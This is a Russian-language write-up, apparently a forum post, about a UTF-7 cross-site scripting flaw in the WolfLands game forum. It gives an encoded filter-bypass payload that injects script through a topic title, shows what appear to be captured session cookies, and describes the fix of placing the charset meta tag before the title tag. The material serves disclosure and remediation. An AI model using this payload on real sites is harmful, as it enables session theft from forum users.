Cross-site Scripting Overview ---> RFC-2152 UTF-7

Для корректного внедрения скрипта, нужно закрыть тег <title>, а затем внедрить тег <script>.
В целом, внедряемый эксплойт может выглядеть так: </title><script>alert(document.cookie);</script>,
что в кодировке UTF-7 выглядит следующим образом:

+ADw-/title+AD4APA-script+AD4-alert(document.cookie)+ADsAPA-/script+AD4-

Как видим, эта строка не содержит ни одного фильтруемого символа, и без проблем может быть
использована для внедрения в форум. В результате создания темы с таким именем, тег <title>
примет вид:

<title>+ADw-/title+AD4APA-script+AD4-alert(document.cookie)+ADsAPA-/script+AD4-</title>

пример срабатывания:

wlsite=TEST%7Cb59c67bf196a4758191e42f76670ceba%7C1 207421594; wlsite_csrfchk=f81465d5795af4955b83



_____________________________[ Исправление уязвимости ]_____________________________

выводимый код заголовка форума

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Тут у нас есть тема</title>
<meta name="ROBOTS" content="INDEX,FOLLOW" />
<meta http-equiv="content-type" content="text/html;charset=windows-1251">
<meta name="Description" content=" &gt;&lt;i&gt;test &gt;&lt;&lt;i&gt;i&gt;&gt;[imgs]=http://www.wolflands.ru/fm/shared_[/imgs]test" />
<meta name="Keywords" content="online RPG game WolfLands forum онлайн РПГ игра форум" />
<meta name="abstract" content="" />
<meta name="Document-state" content="Dynamic" />
<meta name="URL" content="http://www.wolflands.ru/" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<link href="http://www.wolflands.ru/fm/bb_default_style.css" type="text/css" rel="STYLESHEET" />

желаемый вывод заголовка форума

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html;charset=windows-1251">
<title>Тут у нас есть тема</title>
<meta name="ROBOTS" content="INDEX,FOLLOW" />
<meta name="Description" content=" &gt;&lt;i&gt;test &gt;&lt;&lt;i&gt;i&gt;&gt;[imgs]=http://www.wolflands.ru/fm/shared_[/imgs]test" />
<meta name="Keywords" content="online RPG game WolfLands forum онлайн РПГ игра форум" />
<meta name="abstract" content="" />
<meta name="Document-state" content="Dynamic" />
<meta name="URL" content="http://www.wolflands.ru/" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<link href="http://www.wolflands.ru/fm/bb_default_style.css" type="text/css" rel="STYLESHEET" />

__________________________________________________ ________


Пояснение

Как видим, в странице указан метатег с кодировкой windows-1251, что однозначно определяет кодировку страницы. Однако обратим внимание на то, что тег <title>, куда заносится тема текущего топика, находится перед метатегом (отмечено зеленым). А это значит, учитывая описанные особенности парсинга, что если в тег title будет внедрен скрипт в кодировке UTF-7, то он будет раскодирован и выполнен. Таким образом, для проведения XSS атаки, достаточно создать в форуме тему, название которой будет зашифровано в кодировке UTF-7 и содержать вредоносный скрипт.

)) думаю если постаратся то можно исправить